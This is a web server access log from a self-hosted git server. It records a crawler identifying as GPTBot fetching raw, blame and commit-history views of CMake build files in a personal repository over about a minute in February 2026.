- GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11518] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16402] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39741] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10177] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10181] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39741] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20383] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14298] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51202] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:15:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14306] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14304] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10022] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10024] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20385] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 